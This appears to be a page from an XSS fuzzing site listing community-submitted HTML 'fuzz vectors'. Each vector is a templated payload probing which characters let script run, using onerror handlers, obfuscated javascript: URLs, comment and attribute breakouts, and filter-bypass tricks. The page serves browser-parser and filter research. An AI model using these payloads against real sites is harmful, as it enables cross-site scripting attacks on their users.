Featured vector
No vectors found in the last 30 days
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri vbscript waf xml
3,336,911 Successful fuzzes
Fuzz Vectors
Searching for "HTML"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| Characters that close a HTML comment 4 | <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @irsdl |
| Characters allowed between event handlers and equal sign | <img src="about:blank" onerror*chr*=logChr(*num*)> | @peksa |
| HTML input image tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> | @peksa |
| HTML input tag attributes that run JavaScript | <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> | @peksa |
| Characters that escape html input tag | <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> | @peksa |
| Characters that close a HTML comment 0021 | <!--*chr*><img src=xxx:x onerror=log(*num*)> --> | @matttiko |
| char after lt and before still valid html | <*chr*,script>logChr(*num*);</script> | @p_laguna |
| Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
| Characters allowed between and in HTML entities in style attribute | <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> | @tifkin_ |
| test for progress | <progress value="*num*" max="*num*"></progress> | @kinmenhacker |
| Characters allowed after domain | <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed before http | <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed in between dashes to end html comments | <!-- -*chr*-> <script>logChr(*num*)</script> --> | @JohnathanKuskos |
| char after lt still valid html | <*chr*a href=x onerror=logChr(*num*)> | @ethicalhack3r |
| characters allowd in html entities | <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> | @insertScript |
| Entities allowed with no semi colon | htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| HTML Entity in between and | <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> | @MisterJyu |
| Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters transformed in expando attributes | <div id="fuzzelement*num*" expando*chr*="123">test</div> | @garethheyes |
| Expandos attributes characters removed | <div id="fuzzelement*num*" expando*chr*=123>test</div> | @garethheyes |
| Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Tags that have the onload event | <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> | @garethheyes |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Break out of HTML element from single quoted attribute | <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> | @peksa |
| Escaped characters that break out of single quote HTML attribute | <img src='xx:x\*chr* onerror="logChr(*num*)">'> | @peksa |
| Characters that escape single quoted HTML attributes | <img src='xx:x*chr* onerror="logChr(*num*)">'> | @peksa |
| Characters syntactically equivalent to double quote in HTML attributes | `"'><img src="#*chr* onerror=log(*num*)> | @p_laguna |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that close a HTML comment 3 | --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> | @DOMXss |
| Characters that trigger a new attr after new line | <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Tags and events that execute javascript 2 | <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> | @garethheyes |
| Tags and events that execute javascript | <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> | @garethheyes |
| Tags that execute onerror | <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> | @garethheyes |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters syntactically equivalent to single quote in HTML attributes | `"'><img src='#*chr* onerror=log(*num*)> | @_cweb |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters that close a HTML comment | --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |